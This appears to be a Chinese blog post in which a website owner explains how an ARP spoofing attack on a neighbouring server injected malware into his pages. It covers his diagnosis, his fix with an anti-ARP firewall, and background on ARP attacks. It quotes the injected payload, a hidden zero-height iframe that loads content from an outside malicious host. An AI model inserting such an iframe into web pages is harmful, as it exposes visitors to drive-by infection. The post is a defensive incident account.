服务器被ARP攻击，网站被挂马

　　今天凌晨一打开自己的网站，卡巴就弹出来说有病毒，报告为“恶意程序 Exploit.Win32.IMG-ANI.k 文件: F:\Documents and Settings\*****\Local Settings\Temporary Internet Files\Content.IE5\DF7VHPOE\love[1].jpg”，然后网页显示的也有问题，最上方居然裸露出来了一小段源码，于是马上查看源码，发现代码居然被改了.

　　最上面变成了：

　　〈IFRAME height=0 src="httP://web.21575.com/113/" width=150〉〈/IFRAME〉

　　我的第一反应就是网站被人挂马了，首先想到的是不是程序有漏洞，被人传了木马，赶紧用FTP连上，检查ASP文件，发现所有的ASP文件都没有是今天修改过的，模板系统也没有问题，这下我真的不知道怎么办了。都搞不清楚问题出在哪里。。。

　　然后我对挂马的这个网站来了兴趣，在百度里一搜“21575”，

　　http://www.baidu.com/s?word=domain:21575&ie=gb2312&ct=0

　　发现有一条的结果的标题是“服务器被ARP欺骗，大家请不要访问我的站”，看了一下那条帖子，然后又联想到昨天下午收到了IDC的短信，提醒说最近ARP病毒泛滥，于是我马上就想到应该是受到ARP攻击了。

　　下午我还去IDC的网站上看了一下，有一篇关于防范ARP攻击的公告，还提供了ARP防范工具下载，赶紧下了，然后安装.

　　这个软件是ARP防火墙(Anti ARP Sniffer)，下载地址：http://www.antiarp.com/newsopen2.asp?ArticleID=24

　　官网：http://www.antiarp.com

　　刚装上以后ARP防火墙启动不了，于是重启服务器，顺利启动了，然后就看到ARP防火墙提示受到ARP攻击了，还能跟踪到攻击的来源IP

　　装上ARP防火墙以后，再访问网站，一切正常.

　　ARP攻击的先进性就好比DNS劫持一样，处于最上层。网页实际的文件并没有改变，但是发送给浏览器以后就变了样了，被病毒给改了.

　　相关知识：

　　ARP即Address Resolution Protocol，将网络IP地址映射至网卡硬件MAC地址的协议。一般危害为欺骗同网段内的其他服务器地址，截获其数据报文、监听数据传输、盗取帐号信息，甚至对来访数据包进行欺骗和伪造。

　　该病毒发作方式为：网段内一台服务器中此病毒，病毒将以此机器作为肉鸡，对同网段服务器进行数据劫持和欺骗。类似于夺取同段内的其他服务器的IP，导致合法服务器无法正常通讯。此病毒还可对网关地址进行欺骗，造成此网段所有IP地址都无法正常解析。以致网络大面积瘫痪。

　　我这次的情形就是上面说的“对来访数据包进行欺骗和伪造”、“对同网段服务器进行数据劫持和欺骗”，ARP防火墙查到了攻击源，是同网段内的一台机子，我看了一下那台机子，居然是用IIS的默认站点建的站(可以直接用IP访问)，估计系统漏洞不少，被人攻击中毒了，然后连累到我们同网段内的其他无辜的用户。

　　安全很重要!尤其是在最近病毒木马泛滥的日子里。